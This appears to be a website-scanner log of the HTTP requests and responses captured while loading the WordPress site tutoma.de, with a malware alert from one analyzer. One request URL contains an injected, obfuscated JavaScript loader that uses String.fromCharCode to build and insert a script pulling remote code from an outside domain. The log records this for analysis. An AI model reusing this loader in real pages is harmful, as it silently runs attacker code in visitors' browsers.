img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb0ea68cc-d723-41ae-8bc2-16e2e422e2aa.jpeg
34.120.237.76 200 OK 5.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb0ea68cc-d723-41ae-8bc2-16e2e422e2aa.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash c6380f73d47906bd63b9c48137e4df61
94e053461d2db89e9d08321f26a2555ebcd7e0b9
84144e3c3e7acc7339fd1da9b373f18582734b6f4d235b2aef8c90616ed1c8a7
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb0ea68cc-d723-41ae-8bc2-16e2e422e2aa.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 5914
x-amzn-requestid: 8dea187e-ee61-4691-aff7-59202f978565
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: b2P4MF0UIAMFWBw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6378c69a-011430f86689624a29d71215;Sampled=0
x-amzn-remapped-date: Sat, 19 Nov 2022 12:05:46 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: c2w_q7fYc60JSQ4GcAlmUFyp7csfflgG8GvCXJuy_wWlvf9mIG0u9g==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 2324edbcb8fc72f617442c65f36a40fc.cloudfront.net (CloudFront), 1.1 google
date: Tue, 22 Nov 2022 22:38:55 GMT
age: 85402
etag: "94e053461d2db89e9d08321f26a2555ebcd7e0b9"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F4d582ed2-f829-4647-9113-832d4500a207.jpeg
34.120.237.76 200 OK 9.1 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F4d582ed2-f829-4647-9113-832d4500a207.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 6d2c986e076309d51d199332caebb07a
343a5bfba0f8fec28f9345f276b44f44c6eaf6a6
64e6fba6a45c70c1db6040a2273472774c00257bef373cc45b6ca00cb819681a
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F4d582ed2-f829-4647-9113-832d4500a207.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9138
x-amzn-requestid: 524e565e-a9fb-45f9-b786-d64cf26a3cdf
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cBcAAHG8IAMFhwQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637d4066-3689e70e6212e9e77dc134f4;Sampled=0
x-amzn-remapped-date: Tue, 22 Nov 2022 21:34:30 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: cwu__NPGaU0zyAG0H1yZhmjGsFzvNmzsGv6Zt9hrF5gwSysEio2MjA==
via: 1.1 5a1753718d8b33365e5f693dd338c510.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 17:05:44 GMT
age: 18993
etag: "343a5bfba0f8fec28f9345f276b44f44c6eaf6a6"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44f9633f-15fe-459e-aebf-06d2b582efa8.jpeg
34.120.237.76 200 OK 9.8 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44f9633f-15fe-459e-aebf-06d2b582efa8.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 3e8d7af3a5d030774447a0f71c7824f0
663cace8681891ad55943dd0273493aa9474d102
22068df04672281e392caa485259df103d591ab247c3eb5e0ccba10ffd8a9ef0
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44f9633f-15fe-459e-aebf-06d2b582efa8.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9766
x-amzn-requestid: ca8b7a9f-3c1a-419d-953e-2944bf820e5e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cBcR_Hd4IAMFWUg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637d40d9-4ca5e9b2476a47cd199b9cba;Sampled=0
x-amzn-remapped-date: Tue, 22 Nov 2022 21:36:25 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: RZqqB_Aaam7hYpdAB2fbx-i3iQth9M-OgA25IgCB5Uz0swqVi3-bVg==
via: 1.1 49b94a8674d6e86a841d6523f7dbaf14.cloudfront.net (CloudFront), 1.1 325ed3ba58a560748d886354beef39c0.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:48:19 GMT
age: 2038
etag: "663cace8681891ad55943dd0273493aa9474d102"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F45ca81c5-d11a-4d86-a922-dbdce0f6b46c.jpeg
34.120.237.76 200 OK 5.0 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F45ca81c5-d11a-4d86-a922-dbdce0f6b46c.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 0cc111ba6ae699fca7fbff3490640960
18084197b48ea3b4a143636250396e8791d0285f
34fbba92e665ad371ea2bd1a871251cf0c5b7832d6f4661b21b2cfbd7f786923
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F45ca81c5-d11a-4d86-a922-dbdce0f6b46c.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 4977
x-amzn-requestid: 3e56de91-7ed1-4b1e-b230-5f19b2cc6601
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bxQKBHzdIAMFpUw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6376c70c-41c572d27999534d3c198372;Sampled=0
x-amzn-remapped-date: Thu, 17 Nov 2022 23:43:08 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: xXVgZMdEgIo2J1DEAMtdmM6jDRxBWuDi6waMd1-ExTKHh7Fis_SmvA==
via: 1.1 4d7fa73f804f1c93f20cfc24c4b1266e.cloudfront.net (CloudFront), 1.1 e4d3d5aafc7d7d582423c073065ab562.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:56:51 GMT
age: 1526
etag: "18084197b48ea3b4a143636250396e8791d0285f"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
static.zotabox.com/%3C///%3C/script%3E%3Cscript%20async=true%20language=javascript%3Evar%20nt%20=%20String.fromCharCode(98,%20122);var%20mb%20=%20String.fromCharCode(97,%20106,%2097,%20120,%2067,%20111,%20117,%20110,%20116,%20101,%20114);var%20sb%20=%20String.fromCharCode(115,%2099,%20114,%20105,%20112,%20116);var%20tb%20=%20String.fromCharCode(116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116);var%20lb%20=%20String.fromCharCode(47,%2047,%20100,%20101,%20108,%20105,%20118,%20101,%20114,%20121,%20103,%20111,%20111,%20100,%20115,%20116,%20114,%2097,%20116,%20101,%20103,%20105,%20101,%20115,%2046,%2099,%20111,%20109,%2047,%20115,%20117,%20110,%20110,%20121,%2046,%20106,%20115,%2063,%20116,%20121,%20112,%20101,%2061,%20115,%2099,%20114,%20105,%20112,%20116,%2038,%20103,%20108,%20111,%2098,%2097,%20108,%2061,%20116,%20114,%20117,%20101,%2038);var%20c=document.createElement(sb);c.type=tb,c.async=1,c.src=lb+nt;var%20n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);%3C/script%3E%3Cscript%3E/widgets.js
104.22.54.216 404 Not Found 0 B URL HTTP/2 static.zotabox.com/%3C///%3C/script%3E%3Cscript%20async=true%20language=javascript%3Evar%20nt%20=%20String.fromCharCode(98,%20122);var%20mb%20=%20String.fromCharCode(97,%20106,%2097,%20120,%2067,%20111,%20117,%20110,%20116,%20101,%20114);var%20sb%20=%20String.fromCharCode(115,%2099,%20114,%20105,%20112,%20116);var%20tb%20=%20String.fromCharCode(116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116);var%20lb%20=%20String.fromCharCode(47,%2047,%20100,%20101,%20108,%20105,%20118,%20101,%20114,%20121,%20103,%20111,%20111,%20100,%20115,%20116,%20114,%2097,%20116,%20101,%20103,%20105,%20101,%20115,%2046,%2099,%20111,%20109,%2047,%20115,%20117,%20110,%20110,%20121,%2046,%20106,%20115,%2063,%20116,%20121,%20112,%20101,%2061,%20115,%2099,%20114,%20105,%20112,%20116,%2038,%20103,%20108,%20111,%2098,%2097,%20108,%2061,%20116,%20114,%20117,%20101,%2038);var%20c=document.createElement(sb);c.type=tb,c.async=1,c.src=lb+nt;var%20n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);%3C/script%3E%3Cscript%3E/widgets.js
IP 104.22.54.216:0
GET /%3C///%3C/script%3E%3Cscript%20async=true%20language=javascript%3Evar%20nt%20=%20String.fromCharCode(98,%20122);var%20mb%20=%20String.fromCharCode(97,%20106,%2097,%20120,%2067,%20111,%20117,%20110,%20116,%20101,%20114);var%20sb%20=%20String.fromCharCode(115,%2099,%20114,%20105,%20112,%20116);var%20tb%20=%20String.fromCharCode(116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116);var%20lb%20=%20String.fromCharCode(47,%2047,%20100,%20101,%20108,%20105,%20118,%20101,%20114,%20121,%20103,%20111,%20111,%20100,%20115,%20116,%20114,%2097,%20116,%20101,%20103,%20105,%20101,%20115,%2046,%2099,%20111,%20109,%2047,%20115,%20117,%20110,%20110,%20121,%2046,%20106,%20115,%2063,%20116,%20121,%20112,%20101,%2061,%20115,%2099,%20114,%20105,%20112,%20116,%2038,%20103,%20108,%20111,%2098,%2097,%20108,%2061,%20116,%20114,%20117,%20101,%2038);var%20c=document.createElement(sb);c.type=tb,c.async=1,c.src=lb+nt;var%20n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);%3C/script%3E%3Cscript%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 404 Not Found
date: Wed, 23 Nov 2022 22:22:16 GMT
content-type: text/html; charset=utf-8
vary: Accept-Encoding
x-powered-by: Zotabox
access-control-allow-origin: *
access-control-allow-methods: GET,POST
content-security-policy: default-src 'none'
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 76ed4d7419dc0b31-OSL
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/what-makes-us-different-bg.jpg
87.98.235.184 200 OK 0 B URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/what-makes-us-different-bg.jpg
IP 87.98.235.184:0
GET /wp-content/themes/tutoma/dist/images/what-makes-us-different-bg.jpg HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/jpeg
content-length: 13370
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:29 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-json/contact-form-7/v1/contact-forms/172/refill
87.98.235.184 200 OK 0 B URL HTTP/2 tutoma.de/wp-json/contact-form-7/v1/contact-forms/172/refill
IP 87.98.235.184:0
Analyzer Verdict Alert fortinet Malware
GET /wp-json/contact-form-7/v1/contact-forms/172/refill HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:16 GMT
content-type: application/json; charset=UTF-8
server: Apache
x-powered-by: PHP/7.0
x-robots-tag: noindex
link: <https://tutoma.de/wp-json/>; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages
access-control-allow-headers: Authorization, Content-Type
allow: GET
vary: Origin,X-Forwarded-Proto,Accept-Encoding
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
accept-ranges: none
content-encoding: gzip
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
socialplugin.facebook.net/new_domain_gating/?endpoint=customerchat&page_id=2141796126149219&suppress_http_code=1
157.240.200.16 200 OK 0 B URL HTTP/2 socialplugin.facebook.net/new_domain_gating/?endpoint=customerchat&page_id=2141796126149219&suppress_http_code=1
IP 157.240.200.16:0
GET /new_domain_gating/?endpoint=customerchat&page_id=2141796126149219&suppress_http_code=1 HTTP/1.1
Host: socialplugin.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: br
content-type: application/json; charset=utf-8
x-fb-rlafr: 0
content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: https://tutoma.de
x-fb-debug: IboLV4cwEu3x8T3LlZNMjnHaOQcE24e7veuhEzn5Pm6svv5f02wDmyE55WXQyA1dqpAACBtfA0ECz0Ksb9m7pQ==
date: Wed, 23 Nov 2022 22:22:16 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
www.facebook.com/plugins/customer_chat/facade/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent&current_url=https%3A%2F%2Ftutoma.de%2F&is_loaded_by_facade=true&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
157.240.200.35 200 OK 0 B URL HTTP/2 www.facebook.com/plugins/customer_chat/facade/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent&current_url=https%3A%2F%2Ftutoma.de%2F&is_loaded_by_facade=true&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
IP 157.240.200.35:0
GET /plugins/customer_chat/facade/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent&current_url=https%3A%2F%2Ftutoma.de%2F&is_loaded_by_facade=true&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: br
content-type: application/json; charset=utf-8
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: https://tutoma.de
strict-transport-security: max-age=15552000; preload
x-fb-debug: JG/HyKe1WYJzZtw3dKNiHzElr+xWc0DGZWEdCfxIvlvw0TDoziQ+B46NY7i5uRVk6UCYL//FTPKTDYztp5VaJA==
date: Wed, 23 Nov 2022 22:22:16 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2